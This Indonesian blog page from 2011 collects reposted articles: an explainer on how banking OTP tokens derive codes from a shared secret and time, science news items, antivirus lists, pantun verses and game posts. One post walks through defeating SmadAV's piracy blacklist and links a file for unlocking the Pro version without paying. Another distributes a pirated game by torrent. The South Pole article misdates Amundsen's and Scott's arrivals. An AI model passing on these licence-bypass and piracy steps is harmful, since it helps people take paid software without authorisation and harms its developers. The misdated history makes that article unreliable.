Sabtu, 29 Januari 2011

Cara Kerja Token Internet Banking

Penggunaan token berupa alat kecil semacam kalkulator untuk mengamankan transaksi internet banking kini sudah menjadi hal yang wajib. Token ini menjadi faktor tambahan dalam otentikasi yaitu untuk membuktikan bahwa anda adalah benar-benar pengguna yang sah. Mungkin ada yang bertanya-tanya bagaimana cara kerja token seperti yang dipakai situs internet banking? Bagaimana alat kecil seperti kalkulator itu bisa menghasilkan angka yang juga diketahui oleh server internet banking, padahal alat itu tidak terbubung dengan server. Dalam artikel ini saya akan menjelaskan cara kerja token internet banking, dan dalam artikel berikutnya saya akan membuat token berbasis software dan website sederhana yang akan mensimulasikan internet banking.
Authentication Method
Otentikasi bertujuan untuk membuktikan siapa anda sebenarnya, apakah anda benar-benar orang yang anda klaim sebagai dia (who you claim to be). Ada banyak cara untuk membuktikan siapa anda. Metode otentikasi bisa dilihat dalam 3 kategori metode:
1. Something You Know
Ini adalah metode otentikasi yang paling umum. Cara ini mengandalkan kerahasiaan informasi, contohnya adalah password dan PIN. Cara ini berasumsi bahwa tidak ada seorangpun yang mengetahui rahasia itu kecuali anda seorang.
2. Something You Have
Cara ini biasanya merupakan faktor tambahan untuk membuat otentikasi menjadi lebih aman. Cara ini mengandalkan barang yang sifatnya unik contohnya adalah kartu magnetik/smartcard, hardware token, USB token dan sebagainya. Cara ini berasumsi bahwa tidak ada seorangpun yang memiliki barang tersebut kecuali anda seorang.
3. Something You Are
Ini adalah metode yang paling jarang diapakai karena faktor teknologi dan manusia juga. Cara ini mengandalkan keunikan bagian-bagian tubuh anda yang tidak mungkin ada pada orang lain seperti sidik jari, suara atau sidik retina. Cara ini berasumsi bahwa bagian tubuh anda seperti sidik jari dan sidik retina, tidak mungkin sama dengan orang lain.
Lalu bagaimana dengan metode otentikasi tradisional seperti tanda tangan di atas materai? Masuk ke kategori manakah cara itu dari ketiga metode di atas? Saya pikir tidak ada yang cocok, karena itu saya tambahkan satu lagi yaitu “Something You Can“. Cara ini berasumsi bahwa tidak ada orang lain di dunia ini yang bisa melakukan itu selain anda. Memang otentikasi dengan tanda tangan dibangun di atas asumsi itu, tidak ada yang bisa menuliskan tanda tangan anda kecuali anda. Walaupun pada kenyataannya ada saja orang yang bisa meniru tanda tangan anda dengan sangat baik, namun walaupun menyadari fakta tersebut tanda tangan di atas kertas tetap diakui sebagai bukti otentik atas siapa anda.
Two Factor Authentication
Pada aplikasi yang kritis dan sensitif seperti transaksi keuangan, satu metode otentikasi saja tidak cukup. Oleh karena itu muncul istilah 2FA (Two Factor Authentication) yang merupakan sistem otentikasi yang menggunakan 2 faktor (metode) yang berbeda. Empat metode otentikasi yang sudah saya jelaskan sebelunya dapat dikombinasikan untuk meningkatkan keamanan, salah satu contohnya adalah dengan kombinasi “something you have” berupa kartu ATM dengan “something you know” berupa PIN. Kombinasi ini merupakan kombinasi yang paling banyak dipakai.
Contoh kasus lain adalah ketika anda berbelanja di pasar modern dan membayar dengan kartu, tanpa disadari anda telah memakai lebih dari satu faktor otentikasi. Faktor yang pertama adalah “Something You Have” yaitu kartu debit/kredit anda. Faktor kedua adalah “Something You Know”, ketika anda diminta memasukkan PIN ke dalam mesin EDC. Bahkan mungkin ada faktor ketiga yaitu “Something You Can”, ketika anda diminta menanda-tangani nota pembayaran yang dicetak mesin EDC.
Internet banking juga menggunakan two factor authentication dengan mengombinasikan “something you know” berupa password dan “something you have” berupa hardware token (keyBCA atau Token Mandiri).
Password yang Dikeluarkan Token Internet Banking
Pada umumnya ada dua mode pemakaian token internet banking:
1. Mode Challenge/Response (C/R)
Ini adalah mode yang paling sering dipakai ketika bertransaksi. Dalam mode ini server memberikan challenge berupa sederetan angka. Angka tersebut harus dimasukkan kedalam mesin token untuk mendapatkan jawaban (response). Kemudian pengguna memasukkan angka yang muncul pada tokennya ke dalam form di situs internet banking. Token akan mengeluarkan kode yang berbeda-beda walaupun dengan challenge code yang sama secara periodik tergantung waktu ketika challenge dimasukkan ke dalam token.
2. Mode Self Generated (Response Only)
Dalam mode ini server tidak memberikan tantangan (challenge) apapun. Token pengguna bisa langsung mengeluarkan sederetan angka tanpa harus memasukkan challenge. Seperti mode C/R, token juga mengeluarkan kode yang berbeda-beda secara periodik tergantung waktu ketika token diminta untuk menghasilkan kode self generated.
Sebenarnya jawaban yang diberikan oleh token baik dalam mode C/R maupun Self Generated(resopnse only) tidak lain adalah password juga. Namun berbeda dengan password yang anda pakai untuk login, password yang dihasilkan token ini memiliki keterbatasan untuk alasan keamanan, yaitu:
1. Hanya boleh dipakai 1 kali
Ini disebut dengan OTP (One Time Password). Setelah suatu password dipakai, maka password yang sama tidak bisa lagi dipakai untuk kedua kalinya. Dengan cara ini tidak ada gunanya menyadap password yang dihasilkan token karena password tersebut tidak bisa dipakai lagi. Namun bila password tersebut di-intercept sehingga tidak pernah sampai ke server, maka password tersebut masih berharga karena di mata server, password itu belum pernah dipakai.
2. Hanya boleh dipakai dalam rentang waktu yang terbatas
Password yang dihasilkan token memiliki umur yang sangat terbatas, mungkin antara 3-6 menit bila umurnya habis maka password itu tidak bisa dipakai, walaupun belum pernah dipakai. Nanti akan saya jelaskan mengapa password token memerlukan umur, waktu merupakan unsur yang sangat kritikal dalam sistem ini.
3. Hanya boleh dipakai dalam konteks sempit
Bila password/PIN yang dipakai untuk login adalah password yang bebas konteks, dalam arti dengan berbekal password itu, anda bisa melakukan banyak hal, mulai dari melihat saldo, mengecek transaksi dan sebagainya. Namun password yang dihasilkan token, hanya bisa dipakai dalam konteks sempit, contohnya password yang dipakai untuk mengisi pulsa ke nomor 08123456789, tidak bisa dipakai untuk melakukan transfer dana.
Terbatasnya konteks ini disebabkan karena untuk melakukan transaksi dibutuhkan password yang diikat oleh challenge dari server, sehingga password tersebut tidak bisa dipakai untuk transaksi lain yang membutuhkan challenge code yang berbeda. Contohnya bila challenge yang diberikan server adalah 3 digit terakhir dari nomor handphone (untuk transaksi isi pulsa), atau 3 digit terakhir nomor rekening tujuan (untuk transaksi transfer). Maka password yang dihasilkan token untuk transaksi isi pulsa ke nomor 0812555111222, akan valid juga untuk transaksi transfer uang ke rekening 155887723120222. Sebab kebetulan kedua transaksi tersebut membutuhkan password yang diikat oleh challenge code yang sama, yaitu 222 (diambil dari 3 digit terakhir).
Konteks ini hanya berlaku bila password dihasilkan dalam mode C/R. Password yang dihasilkan dalam mode Self Generated, bisa dipakai dalam transaksi apa saja yang tidak meminta password dengan challenge code.
Jadi bisa disimpulkan bahwa password yang dikeluarkan token bersifat:
1. Selalu berubah-ubah secara periodik
2. Memiliki umur yang singkat
3. Hanya bisa dipakai 1 kali
4. Terbagi dalam ada dua jenis, yaitu:
* Password kontekstual yang terikat oleh challenge code dalam mode challenge/response.
* Password bebas konteks yang dihasilkan dalam mode self generated.
Proses Otentikasi
Seperti password pada umumnya, syarat agar otentikasi berhasil adalah:
password yang dikirimkan client = password yang disimpan di server
Dengan alasan keamanan jarang sekali server menyimpan password user dalam bentuk plain-text. Biasanya server menyimpan password user dalam bentuk hash sehingga tidak bisa dikembalikan dalam bentuk plain-text. Jadi syarat otentikasi berhasil di atas bisa diartikan sebagai hasil penghitungan hash dari password yang dikirim klien harus sama dengan nilai hash yang disimpan dalam server. Perhatikan gambar di bawah ini untuk lebih memahami.
courtesy of “www.unixwiz.net/techtips/iguide-crypto-hashes.html”
courtesy of “www.unixwiz.net/techtips/iguide-crypto-hashes.html”
Penggunaan Salt
Untuk menghindari brute-force attack terhadap hash yang disimpan di server, maka sebelum password user dihitung nilai hashnya, terlebih dahulu ditambahkan string acak yang disebut dengan salt. Perhatikan contoh berikut, bila password user adalah “secret”, maka sebelum dihitung nilai hashnya, password ditambahkan dulu salt berupa string acak “81090273″ sehingga yang dihitung nilai hashnya adalah “secret81090273″ bukan “secret”.
Perhatikan bahwa nilai MD5(“secret81090273″) adalah 894240dbe3d2b546c05a1a8e9e0df1bc sedangkan nilai MD5(“secret”) adalah 5ebe2294ecd0e0f08eab7690d2a6ee69. Bila tanpa menggunakan salt, maka attacker yang mendapatkan nilai hash 5ebe2294ecd0e0f08eab7690d2a6ee69 bisa menggunakan teknik brute force attack atau rainbow table untuk mendapatkan nilai password dalam plain-text. Salah satu contoh database MD5 online yang bisa dipakai untuk crack md5 adalah http://gdataonline.com/seekhash.php . Dalam situs tersebut coba masukkan nilai 5ebe2294ecd0e0f08eab7690d2a6ee69, maka situs tersebut akan memberikan hasil “secret”. Hal ini disebabkan karena situs tersebut telah menyimpan pemetaan informasi secret<=>5ebe2294ecd0e0f08eab7690d2a6ee69.
Penambahan salt “81090273″ membuat nilai hash menjadi 894240dbe3d2b546c05a1a8e9e0df1bc. Bila nilai ini dimasukkan dalam situs tersebut, dijamin tidak akan ada dalam databasenya bahwa nilai hash tersebut adalah “secret81090273″. Dan karena nilai salt ini dibangkitkan secara random, maka tiap user memiliki nilai salt yang berbeda sehingga tidak mungkin attacker bisa membangun database pemetaan antara plaintext dan hash secara lengkap.
Dengan penggunaan salt, maka database pengguna dalam server akan tampak seperti ini:
Username Salt Password Hash
budi 81090273 894240dbe3d2b546c05a1a8e9e0df1bc
Field salt diperlukan ketika melakukan otentikasi. Password yang dikirimkan user akan ditambahkan dulu dengan nilai salt ini baru kemudian dihitung nilai hashnya. Nilai hash hasil perhitungan tersebut akan dibandingkan dengan field Password Hash yang ada di kolom sebelahnya. Bila sama, maka otentikasi berhasil, bila tidak sama, berarti otentikasi gagal. Secara prinsip sama saja dengan gambar di atas, hanya ditambahkan satu langkah yaitu penambahan salt sebelum dihitung nilai hashnya.
Pembangkitan One Time Password (OTP) Token Internet Banking
Apa yang saya jelaskan sebelumnya menjadi dasar dari apa yang akan saya jelaskan berikut ini. Bagaimana cara token menghasilkan sederetan angka sebagai OTP yang bisa diotentikasi oleh server? Ingat bahwa syarat agar otentikasi berhasil adalah password yang dikirim klien harus sama dengan yang disimpan di server. Ingat juga bahwa password yang dihasilkan token selalu berubah-ubah secara periodik. Bagaimana apa yang dihasilkan alat itu bisa sinkron dengan server? Padahal alat tersebut tidak terhubung dengan server, bagaimana server bisa tahu berapa nilai yang dihasilkan token? Jawabannya adalah dengan waktu. Sebelumnya sudah saya sebutkan bahwa waktu adalah elemen yang sangat penting dalam sistem ini. Server dan token dapat sinkron dengan menggunakan waktu sebagai nilai acuan.
OTP dalam Mode Self Generated (Response Only)
Saya akan jelaskan mulai dari pembangkitan OTP dalam mode self generated atau response only. Sebelumnya tentu saja, server dan token harus menyepakati sebuah nilai awal rahasia (init-secret). Nilai awal ini disimpan (ditanam) dalam token dan disimpan juga dalam tabel di server.
Ketika pada suatu waktu tertentu token diminta menghasilkan OTP tanpa challenge code, inilah yang dilakukan token:
1. Mengambil waktu saat ini dalam detik berformat EPOCH (jumlah detik sejak 1 Januari 1970), biasanya dalam granularity 10 detik, sehingga nilai EPOCH dibagi 10.
2. Menggabungkan init-secret dengan waktu saat ini dari langkah 1.
3. Menghitung nilai hash gabungan init-secret dan waktu dari langkah 2.
Nilai hash dari langkah 3 inilah yang menjadi OTP. Namun biasanya OTP diambil dari beberapa karakter/digit di awal hash.
Bagaimana cara server melakukan otentikasi? Caranya mirip dengan yang dilakukan token, yaitu dengan menghitung nilai hash gabungan init-secret dengan waktu saat ini dan mengambil beberapa digit di awal sebagai OTP. Bila OTP yang dikirim user sama dengan OTP yang didapatkan server dari perhitungan hash, maka otentikasi berhasil.
Namun ada sedikit catatan yang harus diperhatikan terkait waktu. Untuk memberikan toleransi perbedaan waktu antara token dan server, dan juga jeda waktu dari sejak server meminta password sampai user meminta token membangkitkan token, maka server harus memberikan toleransi waktu.
Ada tiga kejadian yang perlu diperhatikan waktunya, yaitu:
1. Detik ketika server meminta password (OTP) dari user
2. Detik ketika token membangkitkan OTP
3. Detik ketika server menerima OTP dari user
Perhatikan contoh di bawah ini:
Bila diasumsikan waktu di server sama persis dengan waktu di token (jam internal token), maka kita harus perhatikan bahwa pasti akan ada jeda antara kejadian 1, 2 dan 3. Bila pada detik ke-0 server meminta password dari user, karena lambatnya akses internet, bisa jadi baru pada detik ke-30 user melihat pada browsernya bahwa dia harus memasukkan OTP dari token. Kemudian baru pada detik ke-60 token menghasilkan OTP. Pada detik ke-65 user mensubmit nilai OTP tersebut ke server dan baru tiba di server pada detik ke-90.
Karena pembangkitan OTP tergantung waktu pada saat OTP dibangkitkan, maka OTP yang dihasilkan token, adalah OTP pada detik ke-60. Sedangkan server meminta password dari user sejak detik ke-0. Bagaimana cara server melakukan otentikasi? Caranya adalah dengan memeriksa seluruh kemungkinan OTP dalam rentang waktu yang dipandang memadai, misalkan 180 detik.
Bila sistem menggunakan granularity 10 detik maka server harus menghitung nilai OTP sejak dari detik ke-0, 10, 20, 30, 40, s/d ke 180 dalam kelipatan 10 detik. Perhatikan contoh pada gambar di bawah ini. Dalam sistem ini diasumsikan OTP adalah 6 karakter awal dari MD5 gabungan. Dalam melakukan otentikasi, server harus membandingkan semua nilai OTP sejak detik ke-0 (dalam contoh ini EPOCH/10 = 124868042) hingga waktu toleransi maksimum.
otptoken1Dalam contoh di atas bila user mengirimkan OTP “b1cdb9″ maka otentikasi akan berhasil ketika server menghitung nilai OTP pada detik ke-60 sejak server meminta OTP dari user.
Ilustrasi di atas hanyalah contoh, pada kenyataannya ada kemungkinan waktu antara server dan token tidak sama persis 100%, sehingga server terpaksa harus memberikan toleransi waktu tidak hanya ke depan, namun juga ke belakang. Sebab bisa jadi waktu di server lebih cepat daripada waktu di token. Sebagai contoh ketika waktu di server menunjukkan EPOCH/10=124868219, bisa jadi waktu di token baru menunjukkan EPOCH/10=1248682121 (waktu token terlambat 80 detik).
Misalkan waktu toleransi adalah 3 menit, maka server harus memberikan toleransi 3 menit ke depan dan 3 menit ke belakang relatif terhadap waktu ketika server menerima OTP dari user dan melakukan otentikasi. Ingat, waktu toleransi ini relatif terhadap waktu server melakukan otentikasi. Jadi jika server melakukan otentikasi pada EPOCH/10=600, maka server harus menghitung seluruh nilai OTP sejak EPOCH/10=420 hingga EPOCH/10=780.
Ingat penjelasan saya tentang salt sebelumnya. Kalau dibandingkan dengan OTP ini, maka nilai init-secret adalah sejenis dengan password plain-text pengguna, sedangkan salt atau tambahannya adalah waktu (EPOCH/10).
Umur OTP
Sebelumnya sudah saya sebutkan bahwa sifat dari OTP adalah memiliki umur yang terbatas. Umur ini terkait dengan waktu toleransi yang diberikan server sebesar X detik ke depan dan X detik ke belakang relatif terhadap saat server melakukan otentikasi. Bila waktu toleransi adalah 3 menit (180 detik), maka umur sebuah OTP adalah 3 menit, dalam arti bila server melakukan otentikasi tidak lebih dari 3 menit sejak OTP dibangkitkan token, maka OTP tersebut akan dianggap valid oleh server.
OTP dalam Mode Challenge/Response
Pembangkitan dan otentikasi OTP dalam mode C/R sebenarnya mirip dengan mode self-generated. Bila dalam mode self generated tambahan (salt) dari init-secret adalah waktu (EPOCH/10), dalam mode C/R ini salt/tambahannya lebih banyak. Init-secret tidak hanya ditambah dengan waktu, namun juga ditambah lagi dengan challenge.
Perhatikan gambar di bawah ini. Server melakukan penghitungan OTP untuk semua detik dalam waktu toleransinya.
otptoken2
Dalam mode C/R ada field tambahan yang harus digabungkan sebelum dihitung nilai hashnya, yaitu challenge. Nilai challenge ini diketahui oleh server dan juga oleh token (ketika user mengetikkan challenge ke token), sehingga baik token maupun server akan dapat menghitung OTP yang sama sehingga proses otentikasi dapat berlangsung.
Source: ilmu hacking .com / arif w

Ini Dia Pesawat Tenaga Surya Pertama

NASA lagi-lagi mencatat sejarah baru. Kali ini badan antariksa asal Amerika Serikat itu berhasil menciptakan pesawat ruang angkasa pertama yang berbasis tenaga surya.
Awalnya memang terdengar seperti cuplikan cerita fiksi ilmiah. Tapi, kini NASA telah membuat pesawat ruang angkasa tak berawak tanpa bahan bakar mineral.

Tak seperti pesawat ruang angkasa lainnya, NanoSail-D yang menyerupai bentuk layangan berukuran relatif lebih kecil dan orbitnya tidak terlalu tinggi dari atas permukaan Bumi.

NanoSail-D menggunakan tekanan radiasi matahari untuk membuatnya bergerak dan terbang dengan kecepatan tinggi. NASA mengatakan bahwa satelit mungil ini hanya sebesar 100 kaki persegi dan beroperasi sesuai rencana.

Sebetulnya NanoSail-D telah dilepas ke angkasa sejak 20 Januari 2011 lalu. Namun, hari itu tidak bisa dijadikan sebagai hari pertama ia terbang sampai NASA berhasil menerima frekuensi berupa paket data dari NanoSail-D, yakni lima hari setelahnya.

"Ini adalah kali pertama NASA meluncurkan pesawat ruang angkasa dengan orbit terendah di permukaan Bumi," kata Dean Alhorn, jurubicara NASA, yang dikutip VIVAnews dari Dailymail, Sabtu 29 Januari 2011.

NanoSail-D, pesawat satelit NASA berbasis tenaga suryaNanoSail-D akan terus mengirim sinyal suar hingga baterai di dalamnya habis. Diperkirakan ia akan terbang mengorbiti Bumi sampai 70-120 hari ke depan, tergantung pada kondisi atmosfer.

NanoSail-D sengaja dirancang untuk sebagai demonstrasi teknologi berbasis tenaga surya untuk pesawat ruang angkasa. Jika berhasil, teknologi ini diharapkan dapat menjadi alternatif lain dalam teknologi pengorbitan.

Siapa yang Pertama Menginjak Kutub Selatan?

Headline
foto: istimewa

Kompetisi Nasionalis dan rasa petualangan mendorong penjelajah pergi ke tujuan terjauh Bumi di kutub selatan, pada abad 19 dan 20. Siapa yang pertema sampai?
Norwegia dan Inggris berkompetisi siapa yang pertama mengibarkan bendera disana. Meski Norwegia memenangkan hadiah, kedua negara itu sama-sama bersusah payah menuju ke ‘hambatan hukuman lingkungan’ itu.
Kurator Museum of Natural History Amerika di New York dan penulis ‘Race To End: Amundsen, Scott, and Attainment of the South Pole’ Ross MacPhee mengatakan, orang pertama sampai Kutub Selatan adalah penjelajah Norwegia Roald Amundsen.
Amundsen butuh 99 hari ke Kutub Selatan bersaing dengan perwira AL Inggris Robert Scott. Amundsen, musafir kutub veteran, memimpin tim terdiri dari 18 orang di seluruh benua beku itu akhirnya mencapai kutub pada 14 Desember 1912, kata MacPhee.
Scott dan krunya memang berhasil mencapai Kutub Selatan. Namun empat minggu kemudian pada 17 Januari 1913, mereka tak berhasil kembali hidup-hidup.
“Ketika Amundsen berusia 15, satu-satunya hal yang ia ingin adalah menjadi penjelajah kutub,” kata MacPhee.
“Ia melatih dirinya agara bisa sekeras paku. Ia merupakan ahli logistik, karenanya secara fundamental ia berhasil. Ketika mereka berdua di Ross Ice Shelf (di pantai Antartika, di mana ekspedisi dimulai), tak diragukan ia yang pertama”.
Amundsen memenangkan lomba karena timnya menggunakan kereta luncur anjing untuk perjalanan, mengenakan pakaian bulu dan mulai berlari lebih dulu, kata MacPhee. Sebaliknya, Scott da anak buahnya naik kuda poni, mengenakan wol dan memulai ekspedisinya terlambat.
“Scott tak cukup sadar akan kondisi yang akan ia hadapi,” kata MacPhee. “Anda harus melakukan semuanya secepat mungkin pada puncak musim panas Antartika. Jika tidak, Anda mati”.
Dan mereka memang mati. Sementara Amundsen kembali dengan gelar pahlawan, Scott dan tim meninggal dalam perjalanan kembali dari kutub, membeku dalam kantong tidur, kata MacPhee

Misteri Cincin Planet Saturnus

Headline
foto: istimewa

Sejak teleskop Galileo ditemukan pada 1610, cincin Saturnus terus menjadi misteri. Selama empat abad, astronom berusaha menjelaskan cincin Saturnus itu.
Upaya terbaik sejauh ini dilakukan oleh Robin Canup di Southwest Research Institute di Boulder, Colorado. Ia menerbitkan teori baru pembentukan cincin Saturnus di jurnal Nature. Tak hanya teori sesuai, teori Canup juga mengagumkan. "Cincin itu merupakan sisa-sisa es bulan lampau," ujarnya.
Ketika Saturnus dan satelit terbentuk bersama dengan sisa tata surya 4,5 miliar tahun silam, salah satu bulan besar Saturnus terbentuk dan berada terlalu dekat planet itu orbitnya pun tak stabil.
Bulan bergerak spiral ke dalam, dan gravitasi Saturnus merobek lapisan es luar dan melemparkannya ke orbit dan membentuk cincin yang kita lihat sekarang. Setelah 10 ribu tahun penelanjangan, sisa inti bulan berbatu itu jatuh ke Saturnus dan hancur.
Canup membangun model simulasi komputer rangkaian peristiwa ini. Model ini 90-95% mendekati fakta dari cincin Saturnus terdiri dari es. Canup yakin sisanya berasal dari meteorit yang membumbui cincin itu selama miliaran tahun.
Menurut astronom planet terkemuka NASA Larry Esposito, model-model sebelumnya menyatakan cincin Saturnus berasal dari bulan kecil atau komet yang tercabik-cabik gravitasi planet itu.
Namun, gagasan itu gagal menjelaskan mengapa cincin Saturnus sangat dingin, sementara bulan dan komet mengandung banyak batuan. Teori ‘menyerut es’ Canup mampu menjelaskannya. “Ia punya cara pintar menjelaskan komposisi cincin,” kata Esposito.
Astronom cincin Matius Tiscareno di Cornell University mengatakan, “Meskip belum final, saya rasa ide dasar Canup membuka garis produktif pemikiran”. Namun hingga kini, misteri cincin Saturnus masih terus menjadi misteri.

Kamis, 27 Januari 2011

ARTAV Anti Virus buatan anak indonesia kelas 2 smp

nama Artav mungkin tidak setenar nama antivirus lokal yang lainnya, namun Artav sudah dinobatkan sebagai antivirus terbaik dari 5 antivirus lokal terbaru pada salah satu forum online,pada kali ini saya akan mencoba berbagi tentang antivirus artav.

Antivirus Artav diciptakan oleh siswa kelas 2 SMP Negeri 48 Bandung yang bernama Arrival Dwi Sentosa, walau diciptakan oleh anak SMP, namun Artav memiliki fitur-fitur yang komplit dan variatif, serta cukup tangguh dalam membasmi berbagai macam virus terbaru

Artav diciptakan dengan basis visual basis dan memiliki fitur yang beragam, diantaranya Realtime Protection, Anti Hacker, Mail Scanner, USB Protected dan Link Scanner, Bahkan di versi terbarunya artav 2.4, Artav menambahkan fitur Worm Detector dan Rootkit Detector.

Dengan dukungan hampir 2.000 jenis dengan hampir 500.000 varian virus, Artav berhasil membasmi virus terbaru yang tengah menjangkiti banyak komputer seperti W32/Sality dan VBS/yuyun, sementara itu kecepatan scanning Artav bisa dibilang lumayan cepat.

Bagi anda yang tertarik dengan Artav, anda bisa mendapatkan pada tautan berikut ini


Sebagai warga negara Indonesia, kita seharusnya bangga memiliki tunas-tunas muda yang kreatif dan inovatif, jadi saya sarankan setelah anda download Artav, jangan lupa untuk memberi donasi bagi kelangsungan karya yang kreatif dan inovatif dari tunas muda kita. 


Rabu, 26 Januari 2011

[Update] Menjadikan SmadAV Revisi 8.4.1 Free Jadi Pro

hallo sahabat, 23 Januari lalu SmadAV merilis SmadAV Revisi 8.4.1 yg terbaru. Nah, dulu saya pernah bahas tentang Membuat SmadAV Rev 8.3 Free Menjadi Pro. Sekarang kita akan membahas tentang SmadAV yang terbaru ini ( Rev 8.4.1 ). OK, bila kalian memakai SmadAV Rev 8.3 yang udah dibuat Pro maka ketika di update ke Rev 8.4.1, SmadAV akan mem-BlackList Rev 8.4.1 yg baru saja kalian update.
Terus, bagaimana kalo udah di blacklist ?? Nah, kita akan menghilangkan blacklist tersebut. Kalo dulu kita menggunakan NAMA : antipembajakan dan KEY : dikosongkan, akan berbeda dgn yg sekarang. Untuk bisa mendapatkan SmadAV yang terbaru, silahkan download dahulu di :

SmadAV.Net

Setelah kalian download, uninstall SmadAV yg lama dengan cara : Buka SMADAV -> Klik Protection -> Pilih Uninstall. Jika sudah, install SmadAV Rev 8.4.1 di komputer kalian. Setelah terinstall, hilangkan Blacklist SmadAV nya dengan cara : Buka SMADAV -> Klik Setting -> Pada kotak NAMA : anti-bajakan dan KEY : kosongkan saja -> Klik Registered. Kini, Smadav kalian udah ga’ ke BlackList..


Terakhir, kita hanya tinggal memasukkan NAMA dan KEY nya. Untuk itu, saya punya file RAR yang didalamnya terdapat cara untuk me-registrasi SmadAV terbaru ini. Untuk mendapatkannya, silahkan klik link download dibawah ini :

Registrasi SmadAV

Selamat menikmati….. :D 

sumber : http://aslamtkj.co.nr/

Minggu, 23 Januari 2011

Burnout Paradise: The Ultimate Box

Burnout Paradise: The Ultimate Box (PC/EN)
Genre: Arcade/Racing (Cars)/3D/ Simulators | 2.93 GB

Minimum system requirements:
  • Operating system: Windows XP (SP2) / Vista
  • Processor: 2.8 GHz Intel Pentium 4
  • Memory: 1 GB
  • Video: 128 MB of memory and c support for Pixel Shader 3.0
  • Free hard drive space: 4 GB
  • Sound Card: DirectX compatible

Install notes: Please read "reloaded.nfo"


Watch Trailer


Screenshoot

Total Size 2.93 GB
Read how to download using torrent

.TORRENT URL
 

anti virus gratis

1. AVG Free Edition
AVG dilengkapi dengan resident shield, email scanner, anti virus/trojan. Tidak berat dijalankan di komputer.
2. PCclear Antispyware with Free Antivirus
PCclear Antispyware with Free Antivirus merupakan software anti virus gratis yang dilengkapi dengan anti spyware, active X & registry protection, dan history sweeping.
3. Avast Home Edition
Avast Home Edition menawarkan anti virus, worm, trojan, boot time scanner, feature screen saver scaner membuat antivirus ini dapat bekerja sebagai screen saver.
4. Gucup Antivirus (GAV)
Gucup antivirus mampu men-scan virus dan malware. Dapat mendeteksi virus dalam ZIP atau RAR file. Buatan Universitas AtmaJaya Yogyakarta Indonesia.
5. BitDefender Free Edition
BitDefender adalah antivirus gratis yang juga anti spyware yang menawarkan update setiap jam.
6. RemoveIT Pro
RemoveIT Pro adalah anti virus gratis yang juga mendeteksi dan menghilangkan Spyware, Malware, Worm, Trojan dan Adware.
7. Comodo AntiVirus
Comodo AntiVirus menawarkan proteksi tehadap antivirus dilengkapi anti spyware, trojan, dan malware yang lain. Ditambah feature email scanning dan worm blocker.
8. PC Media Antivirus (PCMAV)
PCMAV merupakan Antivirus indonesia yang dibuat dan dipersembahkan bagi pembaca PC MEDIA
sumber : http://anggabhandel009.blogspot.com

pantun teka teki


Pantun Teka-Teki
Berikut ini adalah beberapa koleksi pantun nasihat, pantun teka-teki untuk orang tercinta, keluarga, teman, sahabat, kekasih, bapak, ibu, dan beberapa kumpulan pantun teka teki lucu, pantun humor, pantun romantis, pantun sindiran dan percintaan terbaru.
Jalan-jalan ke Sumatra
sambil membawa sendal
hai teman-teman semua
salam kenal

ikan tenggiri
ikan Belida
Saya datang kesini
ingin meramaikan acara
Ada cowok badan besar
pas di tengok lemah gemulai
U boleh badan kekar
tapi sayang kek banci
Beli petasan takut ama apinye
Mpok Minah copot kondenye
Biar jelek yang penting atinye
Ayo ngepantun deh rame rame
ikan teri rasa nya asin
belinya di pasar baru
cewe cakep eke tensin
habis mau nya naik mobil baru ..
Tukang Lilin udelnya bodong
Ditabrak Beca ampe mental
Duh Calvin yang bener dong
Masa Berak di bantal
Luka dikorek keluar nanah
Bungkus luka pakai salo
Aduh notia jangan fitnah
Bukannya itu lo
buah nangka buah kedondong..
dikupas kulit supaya mulus..
ganti topik dong..
masa yang bau2 terus..
Pabrik roti produksi ragi
Pabrik rumahan produksi barus
Oke deh gak sama lagi
Tapi jangan buah sama perkutut terus
Ada udang di balik batu
Istri Setia Suka Karaoke
Topik yang baru pasti seru
Katanya Notia yang Paling oke
Sana sini banyak toke
Disela sela ada maling
Wah kok pada lomba oke?
Mending lomba manjat tebing
Bule Pirang jualan Tahu
Jualan Jangkrik ga laku laku
Semua orang juga tau
Mana ada orang sirik ngaku
Orang arab beli kamper
ada monyet makan kedongdong
skrg legiona lagi laper
klo makan bagi-bagi dong
Bangun pagi Alhamdulillahilladzi…
Tidak lupa gosok gigi
Siram badan sana sini
Tidak lupa pakai sabun mandi
Pakai baju pakai celana
Ambil motor bawa bawa tas kerja
Cium tangan ibu bapa
Ngantor dulu yaa…..
pergi pagi pulang sore menjelang
badan letih tidak berdaya
selamat bekerja dengan hati riang
jangan lupa untuk tetap hati2 di jalan ya
sapu uduk sapu lidi
baru beli di pasar tadi
aduh myqers yg ada di sini
ayo mampir dan berpantun di sini
Tengah hari tepat jam 12 siang
Tandanya udah boleh makan siang
Pakai jaket bawa motor
habis makan jangan molor.
mampir sebentar tuk melihat
tak lupa mengirimkan pantun
tapi apa daya bila tak patut
mohon sudi memberi pencerahan
pinjam uang harus dibalas
biar tidak ada utang tersimpan
bukan maksud hati tak membalas
apa daya tak pandai berpantun

game pes 2011

Game Terbaru 2011
Game 2011


Game Terbaru 2011
– Download games Gratis, permaianan online gratis sekarang ini memang sangat marak sekali di mainkan, maklum saja hal ini bisa membuat pikiran yang lagi penat hilang, memang game online indonesia sangat berguna untuk masyarakat indonesia.

Jika anda sering bermain game online terbaru pastinya anda tahu pertal game terbaru gemscool yang saat ini menjadi pemilik game paling trend point blank, pastinya saya yakin anda akan tahu kok. Tak hanya game 2011 yang sekarang ini turs di buru, game laptop juga banyak yang mencari downloadnya, ha ini bisa di lihat kalau peminat game memang benar-benar banyak pengaksesnya.
Silahkan di temukan game online di internet, sebelumnya silahkan kunjungi artikel kami tentang download game gratis, selamat menemukan game online terbaru 2011 semoga anda puas dengan adanya games online yang beredar di internet ini.
PES 2011
Game Bola dari Konami Pro Evolution Soccer 2011 PES 2011, dirilis resmi oleh Konami, Pro Evolution Soccer 2011 akan mengalami beberapa perombakan yang disertai dengan beberapa fitur baru. “Sudah saatnya untuk PES untuk berubah, dan PES 2011 ini akan merupakan redesain yang paling ambisius dalam sejarah franchise ini,” komentar Jon Murphy, European PES Team Leader dari Konami.
PES 2011
PES 2011
Perubahan utama terdapat pada pada sistem kontrolnya, dimana Konami menjanjikan pemain dapat melakukan total control pada setiap elemen permainan.
Juga untuk pertama kalinya, Konami akan menyertakan fitur permainan online dalam mode yang disebut Master League. Franchise ini secara resmi akan menampilkan Copa Libertadores, kejuaraan sepakbola premier Amerika Selatan.
Konami juga mengajak para penggemar game in Pro Evolution Soccer 2011i untuk ikut berpartisipasi memberi masukan dalam sebuah situs online KonamiSupport.com. Hasil survei itu nantinya akan digunakan sebagai ide dasar untuk menyempurnakan game terbarunya ini.
